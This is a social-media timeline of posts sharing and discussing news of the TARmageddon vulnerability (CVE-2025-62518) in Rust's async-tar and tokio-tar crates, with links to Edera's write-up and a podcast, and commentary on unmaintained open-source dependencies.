Show threadhttps://purl.org/rzr#Jan 14
https://edera.dev/stories/tarmageddon# #TARmageddon (CVE-2025-62518): RCE Vulnerability Highlights the Challenges of #OpenSourceAbandonware ; How community can mitigate this : https://purl.org/rzr/abandonware
CVE-2025-62518 Shows the Cost of Open Source Abandonware

Edera uncovers TARmageddon (CVE-2025-62518), a Rust async-tar RCE flaw exposing the real dangers of open-source abandonware and supply chain security.

Edera
Josh BressersDec 1

This episode of #OpenSourceSecurity I chat with Alex Zenla from Edera about the #TARmageddon vulnerability they found

I've coordinated a lot of vulnerabilities in my day, but never have I had to even think about something as difficult as this one. Alex fills us in on how it was found, what the coordination looked like, and some things to think about as we manage these incredibly complex supply chains

https://opensourcesecurity.io/2025/2025-12-tarmageddon-alex/

TARmageddon with Alex Zenla

Josh discusses the TARmageddon vulnerability with Alex Zenla, CTO of Edera. In this episode, we explore the discovery of the TARmageddon vulnerability. It’s especially interesting because it’s Rust, but also involves multiple end of life crates. Alex shares the story of how Edera managed to figure all this out (it was not simple). Hard problems are still hard, but there’s a lot of lessons in this one. Episode Links Alex Zenla TARmageddon This episode is also available as a podcast, search for “Open Source Security” on your favorite podcast player.

Open Source Security
Show threadhttps://purl.org/rzr#Nov 13, 2025
https://purl.org/rzr/abandonware# #FlossAbandonWare : #TARmageddon (CVE-2025-62518): RCE #Vulnerability Highlights the Challenges of #OpenSource #Abandonware : https://edera.dev/stories/tarmageddon
jbzNov 12, 2025

🪤 TARmageddon (CVE-2025-62518): RCE Vulnerability Highlights the Challenges of Open Source Abandonware

「 In the worst-case scenario, this vulnerability has a severity of 8.1 (High) and can lead to Remote Code Execution (RCE) through file overwriting attacks, such as replacing configuration files or hijacking build backends 」

https://edera.dev/stories/tarmageddon

#TARmageddon #CVE202562518 #rust #rce #cybersecurity

CVE-2025-62518 Shows the Cost of Open Source Abandonware

Edera uncovers TARmageddon (CVE-2025-62518), a Rust async-tar RCE flaw exposing the real dangers of open-source abandonware and supply chain security.

Edera
CycloneNov 11, 2025

Rust async tar libraries are affected by a High 8.1 severity vulnerability CVE-2025-62518 “TARmageddon” which allows potential RCE and supply-chain attacks.

https://forum.hashpwn.net/post/5906

#rust #cve_2025_62518 #TARmageddon #tar #cybersecurity #news #hashpwn

Amy SerratNov 11, 2025
HAS RUST FALLEN INTO THE TAR PIT? Rust hacked ... Tarmageddon! #security #computer #rust #tokyo_tar #blocking_io #errtlings #bookcafe #hack #libraries #maintenance #archive_smuggling #tarmageddon #attack www.youtube.com/watch?v=tC08...

I Never Thought I’d See This
I Never Thought I’d See This

YouTube
Fiona  Nov 11, 2025
So apparently #Tarmageddon is a thing…

While the RCE claim seems bullshit, going by what I’ve heard about it, it wouldn’t have shocked me, given how much unsafe people use in practice, but that isn’t the interesting thing here…

The notable thing is that this is in a widely used unmaintained dependency, making it the exact kind of issue I’ve been warning about for ages and one of the prime reasons I still can’t really get myself to use #Rust: Instead on focusing on a small number of well maintained, highly established packages like for example Boost (in C++), everything is its own crate, mirroring the hellscape that is node and when you complain about it, the defense is always version pinning.

Guess what: Version pinning prevents updates to newer versions that contain fixes and especially doesn’t help with unmaintained software!

Rust has a decent (but not perfect!) technical foundation, but the culture around it really is something that repels me every time…
GripNewsOct 25, 2025
🌗 TARmageddon (CVE-2025-62518) 漏洞:遠端程式碼執行風險凸顯開源被棄專案的挑戰
➤ 開源函式庫的棄置與安全困境:TARmageddon 漏洞揭露
https://edera.dev/stories/tarmageddon
Edera 團隊發現了 Rust 語言的 `async-tar` 函式庫及其分支(包括廣泛使用的 `tokio-tar`)中存在一個名為 TARmageddon (CVE-2025-62518) 的嚴重漏洞。此漏洞允許攻擊者透過操縱檔案覆寫來達成遠端程式碼執行 (RCE),影響了 `uv`、`testcontainers` 等眾多知名專案。由於 `tokio-tar` 廣泛被使用但卻已無人維護,此漏洞的修復過程面臨巨大挑戰,Edera 團隊透過協調各分支維護者進行分散式揭露與修補,並建議使用者立即更新至已修補版本或遷移至活躍維護的分支。
+ 這個漏洞真的很可怕,影響範圍這麼廣,幸好有 Edera 團隊的努力,不然真的不知道會出什麼問題。
+ 開源專案沒有維護者真
#資安 #開源 #漏洞 #RCE #TARmageddon #CVE
CVE-2025-62518 Shows the Cost of Open Source Abandonware

Edera uncovers TARmageddon (CVE-2025-62518), a Rust async-tar RCE flaw exposing the real dangers of open-source abandonware and supply chain security.

Edera
N-gated Hacker NewsOct 25, 2025
Ah, the joys of #open source! 🤦‍♂️ #TARmageddon strikes with a #CVE number longer than a CVS receipt, proving once again that "free" code is never free from #hilarious mishaps! 🎉 Who knew #parsing #bugs could be this entertaining? 🙃
https://edera.dev/stories/tarmageddon #source #mishaps #HackerNews #ngated
CVE-2025-62518 Shows the Cost of Open Source Abandonware

Edera uncovers TARmageddon (CVE-2025-62518), a Rust async-tar RCE flaw exposing the real dangers of open-source abandonware and supply chain security.

Edera
Hacker NewsOct 25, 2025

Tarmageddon Open Source Abandonware

https://edera.dev/stories/tarmageddon

#HackerNews #Tarmageddon #Open #Source #Abandonware #Tarmageddon #OpenSource #Abandonware #SoftwareDevelopment #TechNews #OpenSourceCommunity

CVE-2025-62518 Shows the Cost of Open Source Abandonware

Edera uncovers TARmageddon (CVE-2025-62518), a Rust async-tar RCE flaw exposing the real dangers of open-source abandonware and supply chain security.

Edera